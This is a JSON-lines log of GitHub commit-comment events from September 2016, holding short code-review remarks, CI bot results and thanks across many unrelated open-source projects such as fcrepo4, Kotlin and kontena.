{"id":"4520884773","type":"CommitCommentEvent","actor":{"login":"miminar"},"repo":{"name":"legionus/origin"},"payload":{"comment":{"id":18909884,"position":106,"line":106,"path":"docs/proposals/docker-registry-split.md","commit_id":"708bfee7c20c5951bbbaa5753dad8198d171eb92","created_at":"2016-09-06T12:03:36Z","updated_at":"2016-09-06T12:03:36Z","body":"I don't understand this sentence."}},"created_at":"2016-09-06T12:03:36Z"}
{"id":"4520885106","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"fcrepo4/fcrepo4"},"payload":{"comment":{"id":18909885,"position":123,"line":123,"path":"fcrepo-http-api/src/main/java/org/fcrepo/http/api/DefaultPathLockManager.java","commit_id":"f6d4591e5da92a490fd738f2e58016f5c3f637dc","created_at":"2016-09-06T12:03:41Z","updated_at":"2016-09-06T12:03:41Z","body":"Can this be 'final'?"}},"created_at":"2016-09-06T12:03:41Z"}
{"id":"4520888045","type":"CommitCommentEvent","actor":{"login":"kke"},"repo":{"name":"kontena/kontena"},"payload":{"comment":{"id":18909892,"position":17,"line":29,"path":"server/app/models/authorization_request.rb","commit_id":"554bfbaa919043ba7fa7ed221b052e893421fefb","created_at":"2016-09-06T12:04:23Z","updated_at":"2016-09-06T12:04:23Z","body":"Sure if mongo has something like \"find + delete\" in one query.\r\n"}},"created_at":"2016-09-06T12:04:23Z"}
{"id":"4520897416","type":"CommitCommentEvent","actor":{"login":"nathanmarks"},"repo":{"name":"Shopify/javascript"},"payload":{"comment":{"id":18909914,"position":null,"line":null,"path":null,"commit_id":"85adbde390786c7d7737a8922aadb1d20277ec80","created_at":"2016-09-06T12:06:38Z","updated_at":"2016-09-06T12:06:38Z","body":"This is a great move 🎉 "}},"created_at":"2016-09-06T12:06:38Z"}
{"id":"4520899042","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"fcrepo4/fcrepo4"},"payload":{"comment":{"id":18909916,"position":211,"line":211,"path":"fcrepo-http-api/src/main/java/org/fcrepo/http/api/DefaultPathLockManager.java","commit_id":"f6d4591e5da92a490fd738f2e58016f5c3f637dc","created_at":"2016-09-06T12:07:02Z","updated_at":"2016-09-06T12:07:02Z","body":"Just `new ArrayList<>()`"}},"created_at":"2016-09-06T12:07:02Z"}
{"id":"4520903291","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"fcrepo4/fcrepo4"},"payload":{"comment":{"id":18909921,"position":214,"line":214,"path":"fcrepo-http-api/src/main/java/org/fcrepo/http/api/DefaultPathLockManager.java","commit_id":"f6d4591e5da92a490fd738f2e58016f5c3f637dc","created_at":"2016-09-06T12:08:01Z","updated_at":"2016-09-06T12:08:01Z","body":"This would read better to me as\r\n```\r\nactivePaths.forEach( (path, lock) -> if (isOrIsDescendantOf(path, deletePath)) { locks.add(lock.getWriteLock()); });\r\n```"}},"created_at":"2016-09-06T12:08:01Z"}
{"id":"4520909816","type":"CommitCommentEvent","actor":{"login":"KnightMiner"},"repo":{"name":"SlimeKnights/TinkersConstruct"},"payload":{"comment":{"id":18909936,"position":null,"line":null,"path":null,"commit_id":"9466eba928ac2918380e6e3ba97f80f431b3a127","created_at":"2016-09-06T12:09:32Z","updated_at":"2016-09-06T12:09:32Z","body":"You also need to increase the TE render bounding boxes X and Z as right now it only contains the center of the liquid (so it will disappear when you look only at an edge block)"}},"created_at":"2016-09-06T12:09:32Z"}
{"id":"4520916084","type":"CommitCommentEvent","actor":{"login":"kke"},"repo":{"name":"kontena/kontena"},"payload":{"comment":{"id":18909951,"position":17,"line":29,"path":"server/app/models/authorization_request.rb","commit_id":"554bfbaa919043ba7fa7ed221b052e893421fefb","created_at":"2016-09-06T12:10:59Z","updated_at":"2016-09-06T12:10:59Z","body":"The deleted_at field is there so that i can do `AccessToken.where(access_token: \"abcd\", deleted_at: nil).find_and_modify({ '$set' : { 'deleted_at' : Time.now.utc } })` so that it doesn't need some locking or mutex, it gets marked as used instantly during the same query."}},"created_at":"2016-09-06T12:10:59Z"}
{"id":"4520920207","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18909960,"position":null,"line":null,"path":null,"commit_id":"1581ee2e54d8ef6eb1f47c9958b0d8733778cd4a","created_at":"2016-09-06T12:11:58Z","updated_at":"2016-09-06T12:11:58Z","body":"@Sami32 I don't understand what you mean, do you mean that some code made by me is the problem? If you think you know what code is the problem, please point to the problem. That said, I doubt that's so, very little of the involved code is mine."}},"created_at":"2016-09-06T12:11:58Z"}
{"id":"4520924644","type":"CommitCommentEvent","actor":{"login":"elibrooks"},"repo":{"name":"bnjbvr/lean-data-practices"},"payload":{"comment":{"id":18909973,"position":4,"line":3,"path":"README.md","commit_id":"35999a2e9b3ab993bf78a3cebcce8673f48a3435","created_at":"2016-09-06T12:12:58Z","updated_at":"2016-09-06T12:12:58Z","body":"u"}},"created_at":"2016-09-06T12:12:58Z"}
{"id":"4520926570","type":"CommitCommentEvent","actor":{"login":"ajs6f"},"repo":{"name":"fcrepo4/fcrepo4"},"payload":{"comment":{"id":18909977,"position":252,"line":252,"path":"fcrepo-http-api/src/main/java/org/fcrepo/http/api/DefaultPathLockManager.java","commit_id":"f6d4591e5da92a490fd738f2e58016f5c3f637dc","created_at":"2016-09-06T12:13:26Z","updated_at":"2016-09-06T12:13:26Z","body":"Just `acquired.forEach(PathScopedLock::unlock)`"}},"created_at":"2016-09-06T12:13:26Z"}
{"id":"4520928265","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"coccinelle/coccinelle"},"payload":{"comment":{"id":18909984,"position":null,"line":null,"path":null,"commit_id":"e947b76d56ce30b8eb817654720bfd4412c02d8d","created_at":"2016-09-06T12:13:49Z","updated_at":"2016-09-06T12:13:49Z","body":"How do you think about to move such \"thanks\" from the commit title to a more detailed commit description?   :wink:"}},"created_at":"2016-09-06T12:13:49Z"}
{"id":"4520933884","type":"CommitCommentEvent","actor":{"login":"NetDEF-CI"},"repo":{"name":"opensourcerouting/quagga"},"payload":{"comment":{"id":18909998,"position":null,"line":null,"path":null,"commit_id":"be58306b036d1007e90ad675a608f1b27b5394e2","created_at":"2016-09-06T12:15:10Z","updated_at":"2016-09-06T12:15:10Z","body":"# Continous Integration Result: SUCCESSFUL\n\nCongratulations, this patch passed basic tests\n\nTested-by: NetDEF / OpenSourceRouting.org CI System\n\n__CI System Testrun URL: https://ci1.netdef.org/browse/QUAGGA-GITHUBOSRQUAGGA-130/__\n\nThis is a comment from an EXPERIMENTAL automated CI system.\nFor questions and feedback in regards to this CI system, please feel free to email\nMartin Winter - mwinter (at) opensourcerouting.org.\n\n"}},"created_at":"2016-09-06T12:15:10Z"}
{"id":"4520935312","type":"CommitCommentEvent","actor":{"login":"konradkonrad"},"repo":{"name":"raiden-network/raiden"},"payload":{"comment":{"id":18910001,"position":null,"line":null,"path":null,"commit_id":"0c7c4a2d4a68af407fdb03a084c531b1bc068717","created_at":"2016-09-06T12:15:27Z","updated_at":"2016-09-06T12:15:27Z","body":":+1: "}},"created_at":"2016-09-06T12:15:27Z"}
{"id":"4520935582","type":"CommitCommentEvent","actor":{"login":"Gillou68310"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":18910002,"position":null,"line":null,"path":null,"commit_id":"328a5ffec02f686248718de0a070520a30ad8805","created_at":"2016-09-06T12:15:29Z","updated_at":"2016-09-06T12:15:29Z","body":"Ok"}},"created_at":"2016-09-06T12:15:29Z"}
{"id":"4520936968","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18910010,"position":55,"line":81,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/inline/LambdaInfo.java","commit_id":"f4a5ce11ffafa76452d061587228b512e23811d6","created_at":"2016-09-06T12:15:49Z","updated_at":"2016-09-06T12:15:49Z","body":"```\r\n}\r\nelse {\r\n```"}},"created_at":"2016-09-06T12:15:49Z"}
{"id":"4520937675","type":"CommitCommentEvent","actor":{"login":"lazyatom"},"repo":{"name":"defunkt/resque-lock"},"payload":{"comment":{"id":18910011,"position":null,"line":null,"path":null,"commit_id":"18c4598f063f13a3ee9b614f9ccea1cbcb1dfb26","created_at":"2016-09-06T12:15:59Z","updated_at":"2016-09-06T12:15:59Z","body":"I *think* this assertion doesn't do what we'd hope. In `Resque::Plugins.lint`, we call `Resque::Plugins::Lock.methods`, which only includes the default object methods, and not any of the interesting ones like `before_enqueue_lock` and `around_perform_lock`. Those are only available via `Resque::Plugins::Lock.instance_methods`. Am I wrong?"}},"created_at":"2016-09-06T12:15:59Z"}
{"id":"4520941384","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18910020,"position":27,"line":52,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/inline/LambdaInfo.java","commit_id":"f4a5ce11ffafa76452d061587228b512e23811d6","created_at":"2016-09-06T12:16:50Z","updated_at":"2016-09-06T12:16:50Z","body":"Let's not compromise finality for a slightly more convenient initialization code in the constructor."}},"created_at":"2016-09-06T12:16:50Z"}
{"id":"4520950590","type":"CommitCommentEvent","actor":{"login":"vihryn"},"repo":{"name":"hankypanky666/emberProject"},"payload":{"comment":{"id":18910043,"position":8,"line":8,"path":"app/components/rec-row.js","commit_id":"4e0ed68f750bdf3fb97a5d639d6f1b85b8043e9d","created_at":"2016-09-06T12:18:56Z","updated_at":"2016-09-06T12:18:56Z","body":"yep"}},"created_at":"2016-09-06T12:18:56Z"}
{"id":"4520950990","type":"CommitCommentEvent","actor":{"login":"wffranco"},"repo":{"name":"yuche/vue-strap"},"payload":{"comment":{"id":18910046,"position":52,"line":119,"path":"src/Modal.vue","commit_id":"fdde0f9be148780b69bed7aa61723a6391be0657","created_at":"2016-09-06T12:19:01Z","updated_at":"2016-09-06T12:19:01Z","body":"You can fix it? If you can, try adding this:\r\n```javascript\r\nbeforeDestroy () {\r\n  $(this.$el).off('click transitionend')\r\n}\r\n```\r\nIf this work make a pull request with the change, if not, I'll check it later.\r\n\r\nGreeting."}},"created_at":"2016-09-06T12:19:01Z"}
{"id":"4520951647","type":"CommitCommentEvent","actor":{"login":"cstpdk"},"repo":{"name":"yaccio/yaccio.github.io"},"payload":{"comment":{"id":18910048,"position":null,"line":null,"path":null,"commit_id":"97f6d87c645cb8afcca79a6300f420d1a83bf7e9","created_at":"2016-09-06T12:19:11Z","updated_at":"2016-09-06T12:19:11Z","body":"Prease"}},"created_at":"2016-09-06T12:19:11Z"}
{"id":"4520951670","type":"CommitCommentEvent","actor":{"login":"Guozhongzhi"},"repo":{"name":"Guozhongzhi/computational_physics_2014301020087"},"payload":{"comment":{"id":18910049,"position":null,"line":null,"path":null,"commit_id":"208bdef272a44462ed0fedf9840b47403a51c1aa","created_at":"2016-09-06T12:19:11Z","updated_at":"2016-09-06T12:19:11Z","body":"[Exercise03:All levels](http:www,baidu.com)"}},"created_at":"2016-09-06T12:19:11Z"}
{"id":"4520953202","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18910051,"position":34,"line":59,"path":"compiler/backend/src/org/jetbrains/kotlin/codegen/inline/LambdaInfo.java","commit_id":"f4a5ce11ffafa76452d061587228b512e23811d6","created_at":"2016-09-06T12:19:31Z","updated_at":"2016-09-06T12:19:31Z","body":"Please move several lines above, to final fields"}},"created_at":"2016-09-06T12:19:31Z"}
{"id":"4520953368","type":"CommitCommentEvent","actor":{"login":"ypresto"},"repo":{"name":"ergovia-mobile/android-transcoder"},"payload":{"comment":{"id":18910052,"position":null,"line":null,"path":null,"commit_id":"615042896833aaab7fa6f0be19d582fca6291eca","created_at":"2016-09-06T12:19:34Z","updated_at":"2016-09-06T12:19:34Z","body":"> Our code was initiating the upload in the successCallback of the android transcoder.\r\n\r\nAhh that's right! Closing video file after callback can be problematic for that case.\r\nI'll merge this..!\r\n\r\n "}},"created_at":"2016-09-06T12:19:34Z"}
{"id":"4520955057","type":"CommitCommentEvent","actor":{"login":"allem40306"},"repo":{"name":"allem40306/cplusplus"},"payload":{"comment":{"id":18910057,"position":null,"line":null,"path":null,"commit_id":"f1f23e1d95f00f714389906d8d0289ace4844c5e","created_at":"2016-09-06T12:19:57Z","updated_at":"2016-09-06T12:19:57Z","body":"ac*2 not*1"}},"created_at":"2016-09-06T12:19:57Z"}
{"id":"4520957842","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"coccinelle/coccinelle"},"payload":{"comment":{"id":18910062,"position":null,"line":null,"path":null,"commit_id":"66f792111178db7899c379e95d764e190aa5af13","created_at":"2016-09-06T12:20:35Z","updated_at":"2016-09-06T12:20:35Z","body":"* I find the wording \"It has to be called …\"  hard to understand in this commit description. :wink:\r\n* Are there any further considerations needed around such a long function name in the OCaml source code?"}},"created_at":"2016-09-06T12:20:35Z"}
{"id":"4520958101","type":"CommitCommentEvent","actor":{"login":"adambraimbridge"},"repo":{"name":"Financial-Times/n-ui"},"payload":{"comment":{"id":18910063,"position":null,"line":null,"path":null,"commit_id":"b106b30b0c36012ac1ae835b34c4f3ce8b3023a3","created_at":"2016-09-06T12:20:38Z","updated_at":"2016-09-06T12:20:38Z","body":"@wheresrhys I'm not sure this is correct (I recall some discussion a while back about how we need to explicitly gitignore files, not folders), but this is the error I was getting *before* this commit:\r\n\r\n![image](https://cloud.githubusercontent.com/assets/224547/18273309/7d3d6338-7434-11e6-8e45-dd91feabd762.png)\r\n"}},"created_at":"2016-09-06T12:20:38Z"}
{"id":"4520960805","type":"CommitCommentEvent","actor":{"login":"royrwood"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":18910077,"position":null,"line":null,"path":null,"commit_id":"5b8374a2a9ef74aaab5a9b156bceee30cc7bfb48","created_at":"2016-09-06T12:21:15Z","updated_at":"2016-09-06T12:21:15Z","body":"I would like to be able to support JAVA_OBJECT, since that seems to be how the Postgres JDBC driver handles UUIDs.\r\n\r\nI'd be happy to do the work for that, though I'm unclear on the preferred way to handle a case like that.  I'm looking through the code to see if something similar is done elsewhere, but if anyone can point me in the right direction immediately, I'd love to hear it...."}},"created_at":"2016-09-06T12:21:15Z"}
{"id":"4520967788","type":"CommitCommentEvent","actor":{"login":"mdorman"},"repo":{"name":"NixOS/cabal2nix"},"payload":{"comment":{"id":18910104,"position":21,"line":279,"path":"src/Distribution/Nixpkgs/Haskell/FromCabal/PostProcess.hs","commit_id":"f5997b2389a9fe97baf7f3e82547c198319cde80","created_at":"2016-09-06T12:22:44Z","updated_at":"2016-09-06T12:22:44Z","body":"So obviously I'm an idiot here, insofar as that should have been \"gst_plugins_base = pkgs.gst_all_1.gst-plugins-base\".\r\n\r\nMore to the point, though, that strategy doesn't seem to actually work at all.  I guess I need to actually get cabal2nix buildable so I can test."}},"created_at":"2016-09-06T12:22:44Z"}
{"id":"4520970271","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18910111,"position":null,"line":null,"path":null,"commit_id":"bafa01d451d2d83bfa4cc4d60a6e88cf2e82204e","created_at":"2016-09-06T12:23:17Z","updated_at":"2016-09-06T12:23:17Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/32271/testReport/) for this commit**"}},"created_at":"2016-09-06T12:23:17Z"}
{"id":"4520970713","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18910114,"position":5,"line":5,"path":"compiler/testData/codegen/boxInline/callableReference/intrinsic.kt","commit_id":"f4a5ce11ffafa76452d061587228b512e23811d6","created_at":"2016-09-06T12:23:22Z","updated_at":"2016-09-06T12:23:22Z","body":"Please fix `return return` in this test case"}},"created_at":"2016-09-06T12:23:22Z"}
{"id":"4520977971","type":"CommitCommentEvent","actor":{"login":"garciparedes"},"repo":{"name":"auth0/docs"},"payload":{"comment":{"id":18910127,"position":null,"line":null,"path":null,"commit_id":"98773906aa3d883429dc648e8878deac90fcf256","created_at":"2016-09-06T12:24:58Z","updated_at":"2016-09-06T12:24:58Z","body":"I have an issue with it. Suppose the case to retrieve data from Resource Server that depends on user. My question is the next: What is the best pattern to obtain user data in Resource Server."}},"created_at":"2016-09-06T12:24:58Z"}
{"id":"4520996595","type":"CommitCommentEvent","actor":{"login":"BrikerMan"},"repo":{"name":"johnlui/Pitaya"},"payload":{"comment":{"id":18910155,"position":null,"line":null,"path":null,"commit_id":"561277d972082f1e27dab8189b1889b3d4ec171a","created_at":"2016-09-06T12:29:02Z","updated_at":"2016-09-06T12:29:02Z","body":"Please publish to pod truck. http://yulingtianxia.com/blog/2014/05/26/publish-your-pods-on-cocoapods-with-trunk/"}},"created_at":"2016-09-06T12:29:02Z"}
{"id":"4521016368","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18910197,"position":null,"line":null,"path":null,"commit_id":"dc85535e4ce7e40bbfe1c34daa15dabc557514f6","created_at":"2016-09-06T12:33:14Z","updated_at":"2016-09-06T12:33:14Z","body":"Score of minus vs base: 265 - 252 - 842  [0.505] 1359 STC\r\nELO difference: 3.32 +/- 11.38"}},"created_at":"2016-09-06T12:33:14Z"}
{"id":"4521016478","type":"CommitCommentEvent","actor":{"login":"svladykin"},"repo":{"name":"h2database/h2database"},"payload":{"comment":{"id":18910198,"position":null,"line":null,"path":null,"commit_id":"5b8374a2a9ef74aaab5a9b156bceee30cc7bfb48","created_at":"2016-09-06T12:33:15Z","updated_at":"2016-09-06T12:33:15Z","body":"@royrwood Do you have in mind any specific scenario that is not supported right now with PgSQL driver? It is always good idea to start with failing test cases:)"}},"created_at":"2016-09-06T12:33:15Z"}
{"id":"4521018470","type":"CommitCommentEvent","actor":{"login":"MyHeartsECO"},"repo":{"name":"sorcamarian/angularfire2-instalation-webpack-fixed-errors"},"payload":{"comment":{"id":18910200,"position":null,"line":null,"path":null,"commit_id":"b625b4067f9802a78e73d7da3a8dd8fa2d369eb6","created_at":"2016-09-06T12:33:39Z","updated_at":"2016-09-06T12:33:39Z","body":"This.\r\n\r\nSearched for 2 hours for this. Thank you!"}},"created_at":"2016-09-06T12:33:39Z"}
{"id":"4521025119","type":"CommitCommentEvent","actor":{"login":"jhsilva"},"repo":{"name":"jhsilva/CV"},"payload":{"comment":{"id":18910214,"position":4,"line":4,"path":"readme.md","commit_id":"247f0e0453bf0841158b6daf4965d19e6bdd1880","created_at":"2016-09-06T12:35:04Z","updated_at":"2016-09-06T12:35:04Z","body":"ok"}},"created_at":"2016-09-06T12:35:04Z"}
{"id":"4521025212","type":"CommitCommentEvent","actor":{"login":"nhr"},"repo":{"name":"bexelbie/ascii_binder"},"payload":{"comment":{"id":18910216,"position":null,"line":null,"path":null,"commit_id":"02d2f9d842b7febf8e6d195a73b4c34fa72c68cf","created_at":"2016-09-06T12:35:06Z","updated_at":"2016-09-06T12:35:06Z","body":"Looks good; @fryguy please give this a quick look."}},"created_at":"2016-09-06T12:35:06Z"}
{"id":"4521026611","type":"CommitCommentEvent","actor":{"login":"jhsilva"},"repo":{"name":"jhsilva/CV"},"payload":{"comment":{"id":18910219,"position":9,"line":9,"path":"readme.md","commit_id":"247f0e0453bf0841158b6daf4965d19e6bdd1880","created_at":"2016-09-06T12:35:22Z","updated_at":"2016-09-06T12:35:22Z","body":"ok"}},"created_at":"2016-09-06T12:35:22Z"}
{"id":"4521027082","type":"CommitCommentEvent","actor":{"login":"jestempablo"},"repo":{"name":"jestempablo/stuff"},"payload":{"comment":{"id":18910222,"position":1,"line":1,"path":"coding/codility/5_CountDiv.js","commit_id":"70ceb5b9a1bed99d0ab72823cc4c9bd439dda40a","created_at":"2016-09-06T12:35:28Z","updated_at":"2016-09-06T12:35:28Z","body":"przepraszam ;_;"}},"created_at":"2016-09-06T12:35:28Z"}
{"id":"4521027816","type":"CommitCommentEvent","actor":{"login":"jhsilva"},"repo":{"name":"jhsilva/CV"},"payload":{"comment":{"id":18910227,"position":11,"line":11,"path":"readme.md","commit_id":"247f0e0453bf0841158b6daf4965d19e6bdd1880","created_at":"2016-09-06T12:35:38Z","updated_at":"2016-09-06T12:35:38Z","body":"👎 "}},"created_at":"2016-09-06T12:35:38Z"}
{"id":"4521028531","type":"CommitCommentEvent","actor":{"login":"vvscode"},"repo":{"name":"hankypanky666/emberProject"},"payload":{"comment":{"id":18910231,"position":35,"line":35,"path":"app/routes/index.js","commit_id":"4e0ed68f750bdf3fb97a5d639d6f1b85b8043e9d","created_at":"2016-09-06T12:35:46Z","updated_at":"2016-09-06T12:35:46Z","body":"you can skip `length > 0` - [].map do nothing"}},"created_at":"2016-09-06T12:35:46Z"}
{"id":"4521028707","type":"CommitCommentEvent","actor":{"login":"jhsilva"},"repo":{"name":"jhsilva/CV"},"payload":{"comment":{"id":18910233,"position":27,"line":27,"path":"readme.md","commit_id":"247f0e0453bf0841158b6daf4965d19e6bdd1880","created_at":"2016-09-06T12:35:49Z","updated_at":"2016-09-06T12:35:49Z","body":"ok"}},"created_at":"2016-09-06T12:35:49Z"}
{"id":"4521029979","type":"CommitCommentEvent","actor":{"login":"jturney"},"repo":{"name":"jturney/psi4"},"payload":{"comment":{"id":18910237,"position":24,"line":47,"path":"psi4/src/psi4/libfilesystem/path.cc","commit_id":"46e3f8a1efa2e503a650a9183365a400ecc1e569","created_at":"2016-09-06T12:36:06Z","updated_at":"2016-09-06T12:36:06Z","body":"Oops, good catch! I'll fix it shortly."}},"created_at":"2016-09-06T12:36:06Z"}
{"id":"4521030631","type":"CommitCommentEvent","actor":{"login":"jobachh"},"repo":{"name":"CCI-MIT/XCoLab"},"payload":{"comment":{"id":18910239,"position":95,"line":156,"path":"microservices/clients/members-client/src/main/java/org/xcolab/client/members/MembersClient.java","commit_id":"faf258d5232029a08fb323446291a35e4aed2ca7","created_at":"2016-09-06T12:36:15Z","updated_at":"2016-09-06T12:36:15Z","body":"Good idea, that's a much better name!"}},"created_at":"2016-09-06T12:36:15Z"}
{"id":"4521032317","type":"CommitCommentEvent","actor":{"login":"maxlevesque"},"repo":{"name":"maxlevesque/autoCorrelation"},"payload":{"comment":{"id":18910245,"position":null,"line":null,"path":null,"commit_id":"e5110a208cad4ae9645221bfeec73cc2b72618f6","created_at":"2016-09-06T12:36:34Z","updated_at":"2016-09-06T12:36:34Z","body":"Hi, please open an Issue [here](https://github.com/maxlevesque/autoCorrelation/issues/new) about this :) since I don't think it is related to this specific commit. And give as much detail as possible. :)"}},"created_at":"2016-09-06T12:36:34Z"}
{"id":"4521032903","type":"CommitCommentEvent","actor":{"login":"vvscode"},"repo":{"name":"hankypanky666/emberProject"},"payload":{"comment":{"id":18910251,"position":7,"line":7,"path":"app/routes/index.js","commit_id":"4e0ed68f750bdf3fb97a5d639d6f1b85b8043e9d","created_at":"2016-09-06T12:36:40Z","updated_at":"2016-09-06T12:36:40Z","body":"`result.filterBy('parent', null)`"}},"created_at":"2016-09-06T12:36:40Z"}
{"id":"4521034060","type":"CommitCommentEvent","actor":{"login":"Hoverbear"},"repo":{"name":"sozialhelden/wheelmap"},"payload":{"comment":{"id":18910258,"position":5,"line":60,"path":"config/environments/staging.rb","commit_id":"208ea30df5ac3676ee96a1a8355fbdc56c55979e","created_at":"2016-09-06T12:36:54Z","updated_at":"2016-09-06T12:36:54Z","body":"This causes problems... No longer uses the manifests as far as I can see.\r\n\r\n![screen shot 2016-09-06 at 14 36 36](https://cloud.githubusercontent.com/assets/130903/18273783/5a156d0a-743f-11e6-972b-84e41713db13.png)\r\n"}},"created_at":"2016-09-06T12:36:54Z"}
{"id":"4521035921","type":"CommitCommentEvent","actor":{"login":"shanx"},"repo":{"name":"pydanny/cookiecutter-django"},"payload":{"comment":{"id":18910261,"position":null,"line":null,"path":null,"commit_id":"c5e984cf2365dba59061b930fe5fa14571c25659","created_at":"2016-09-06T12:37:19Z","updated_at":"2016-09-06T12:37:19Z","body":"hey @jayfk of course I can do that. But since I'm not involved in the project I didn't find it up to me to decide on the license. I can revert the license to:\r\n\r\nhttps://github.com/pydanny/cookiecutter-django/blob/7b24c19ce54d21d678ccd084a4c8747e966ec794/LICENSE and change Daniels name to something like Cookiecutter Django contributors.\r\n\r\nOr switch to the MIT license?"}},"created_at":"2016-09-06T12:37:19Z"}
{"id":"4521040076","type":"CommitCommentEvent","actor":{"login":"vvscode"},"repo":{"name":"hankypanky666/emberProject"},"payload":{"comment":{"id":18910273,"position":38,"line":38,"path":"app/routes/index.js","commit_id":"4e0ed68f750bdf3fb97a5d639d6f1b85b8043e9d","created_at":"2016-09-06T12:38:12Z","updated_at":"2016-09-06T12:38:12Z","body":"Here you return only promise from `child.destroyRecord`. But  `_recurssiveDeleteCategories` is async and you doesn't wait till it finish - did you note it?"}},"created_at":"2016-09-06T12:38:12Z"}
{"id":"4521040830","type":"CommitCommentEvent","actor":{"login":"ClemensRobbenhaar"},"repo":{"name":"xwiki-contrib/workflow-publication"},"payload":{"comment":{"id":18910275,"position":22,"line":207,"path":"xwiki-workflow-publication-api/src/main/java/org/xwiki/workflowpublication/internal/DefaultPublicationWorkflow.java","commit_id":"e1063d57e447d19c2d323b78e55c825987fcb485","created_at":"2016-09-06T12:38:21Z","updated_at":"2016-09-06T12:38:21Z","body":"The idea is to reuse the \"isModifiedSingleLanguage\" for the default document, and check this first.\r\nThe `doc.getTranslatedDocument` returns the default document when passed in the `ROOT` locale.\r\n(See https://github.com/xwiki/xwiki-platform/blob/xwiki-platform-8.1/xwiki-platform-core/xwiki-platform-oldcore/src/main/java/com/xpn/xwiki/doc/XWikiDocument.java#L6094 )\r\n\r\nBut I see I could use `fromDoc.getDefaultLocale()` as well - in that case better check first that  the default locale is the same for both `fromDoc` and `toDoc` which I forgot to do in the first place ..."}},"created_at":"2016-09-06T12:38:21Z"}
{"id":"4521041272","type":"CommitCommentEvent","actor":{"login":"Xylakant"},"repo":{"name":"sozialhelden/wheelmap"},"payload":{"comment":{"id":18910276,"position":5,"line":60,"path":"config/environments/staging.rb","commit_id":"208ea30df5ac3676ee96a1a8355fbdc56c55979e","created_at":"2016-09-06T12:38:26Z","updated_at":"2016-09-06T12:38:26Z","body":"interesting. we should investigate, but not now. however, using asset%d.wheelmap.org is not a solution for staging. That would point staging to the prod assets.\r\n \r\n"}},"created_at":"2016-09-06T12:38:26Z"}
{"id":"4521044124","type":"CommitCommentEvent","actor":{"login":"greut"},"repo":{"name":"Diogo-Ferreira/opentheater"},"payload":{"comment":{"id":18910284,"position":39,"line":41,"path":"frontend/index.html","commit_id":"21d8ead237b6df14aecfc86dc2c5a0f45958fbad","created_at":"2016-09-06T12:39:02Z","updated_at":"2016-09-06T12:39:02Z","body":"C'est une mauvaise idée de mettre `node_modules` dans les fichiers publics.\r\n\r\nPour bien, vous devriez créer un _bundle_ avec tous vos fichiers .js (e.g. avec _webpack_, _rollup_, etc.). Ensuite décidez si vous y incluer ces fichiers-là dans votre `bundle` ou les faites venir d'un CDN quelconque comme sur l'exemple de `angular-jwt`."}},"created_at":"2016-09-06T12:39:02Z"}
{"id":"4521046513","type":"CommitCommentEvent","actor":{"login":"rmjarvis"},"repo":{"name":"GalSim-developers/GalSim"},"payload":{"comment":{"id":18910290,"position":73,"line":338,"path":"examples/demo9.py","commit_id":"a6d982227f59e22a7add261e686c4b3579b368fb","created_at":"2016-09-06T12:39:34Z","updated_at":"2016-09-06T12:39:34Z","body":"Why would you expect uniform?  I think the axis perpendicular to the disk is uniform over the solid angle of a sphere, which corresponds to P(theta) = 0.5 sin(theta) for the inclination angle as you define it."}},"created_at":"2016-09-06T12:39:34Z"}
{"id":"4521049390","type":"CommitCommentEvent","actor":{"login":"lujun9972"},"repo":{"name":"lujun9972/org-preview-html"},"payload":{"comment":{"id":18910302,"position":null,"line":null,"path":null,"commit_id":"1f648d513661ede410b162ac99e6b19d461e127c","created_at":"2016-09-06T12:40:12Z","updated_at":"2016-09-06T12:40:12Z","body":"The MELPA has merged my pull request :smile:"}},"created_at":"2016-09-06T12:40:12Z"}
{"id":"4521050755","type":"CommitCommentEvent","actor":{"login":"Hoverbear"},"repo":{"name":"sozialhelden/wheelmap"},"payload":{"comment":{"id":18910307,"position":5,"line":60,"path":"config/environments/staging.rb","commit_id":"208ea30df5ac3676ee96a1a8355fbdc56c55979e","created_at":"2016-09-06T12:40:28Z","updated_at":"2016-09-06T12:40:28Z","body":"After more investigation I'm not sure this is the issue."}},"created_at":"2016-09-06T12:40:28Z"}
{"id":"4521055966","type":"CommitCommentEvent","actor":{"login":"leobalter"},"repo":{"name":"leobalter/proposal-setmap-offrom"},"payload":{"comment":{"id":18910316,"position":4,"line":4,"path":"src/spec.html","commit_id":"2392c51c39d8d6c6edf558ce5968bddaf3fa3dd6","created_at":"2016-09-06T12:41:36Z","updated_at":"2016-09-06T12:41:36Z","body":"done, thanks!"}},"created_at":"2016-09-06T12:41:36Z"}
{"id":"4521056845","type":"CommitCommentEvent","actor":{"login":"wheresrhys"},"repo":{"name":"Financial-Times/n-ui"},"payload":{"comment":{"id":18910319,"position":null,"line":null,"path":null,"commit_id":"b106b30b0c36012ac1ae835b34c4f3ce8b3023a3","created_at":"2016-09-06T12:41:47Z","updated_at":"2016-09-06T12:41:47Z","body":"nope, `/public` isn't allowed. If you remove that line from .gitignore then run `git status -s` it'll tell you which files you need to add to .gitinore"}},"created_at":"2016-09-06T12:41:47Z"}
